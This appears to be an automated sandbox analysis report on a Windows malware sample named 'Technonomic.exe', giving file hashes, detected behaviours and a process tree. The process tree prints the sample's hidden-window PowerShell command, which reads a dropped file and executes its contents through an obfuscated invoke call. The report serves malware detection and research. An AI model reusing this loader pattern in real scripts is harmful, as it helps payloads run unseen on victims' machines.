Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 10:26
Static task
static1
Behavioral task
behavioral1
Sample
Technonomic.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Technonomic.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
-
Target
Technonomic.exe
-
Size
759KB
-
MD5
c174a412be6f74c3323ae8d6d4737086
-
SHA1
c703daa5df8c281206a8d85b582b8a1b729748f5
-
SHA256
bb71b94948e6929047bde8df94c187fbb6f2cc0119a0c386f84b9ea144aabd67
-
SHA512
9f2b95174fd1283964ea61e6dbe07c450ed0a01aad6b3852c43ef6811a92878f0f123dfbc1f88b2cf05479a94af098591bd579f3c3581521819f3b12d20dfa42
-
SSDEEP
12288:iDGZKmormA1bzZN13qv776npUyBsIpxBFmgI2uSb+zKikGOfj8UvbjSM+LLWwvpf:gmor/1/Z877oS8sEx/PI//zKNzpbNQLt
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1816 powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 2872 Technonomic.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\unthick.ini Technonomic.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Technonomic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1816 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2872 wrote to memory of 1816 2872 Technonomic.exe 28 PID 2872 wrote to memory of 1816 2872 Technonomic.exe 28 PID 2872 wrote to memory of 1816 2872 Technonomic.exe 28 PID 2872 wrote to memory of 1816 2872 Technonomic.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\Technonomic.exe"C:\Users\Admin\AppData\Local\Temp\Technonomic.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\Admin\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
33B
MD5e23f52386361095bdb7040b09e2216ae
SHA191f31dd82ab80140db621b6dce0b9b5d6b568723
SHA25636467321184a76e0fea592d2896856a37ec18fc8480de66f05d719d93b39d070
SHA51219d18de54b3466f0d283271786b3b308c3be07f21174c46563c4c16292716c52f2c1b85f416ed77143ea6847bfc4c4c37f22296948eac47499276b181f129b9c
-
Filesize
6KB
MD51b0e41f60564cccccd71347d01a7c397
SHA1b1bddd97765e9c249ba239e9c95ab32368098e02
SHA25613ebc725f3f236e1914fe5288ad6413798ad99bef38bfe9c8c898181238e8a10
SHA512b6d7925cdff358992b2682cf1485227204ce3868c981c47778dd6da32057a595caa933d8242c8d7090b0c54110d45fa8f935a1b4eec1e318d89cc0e44b115785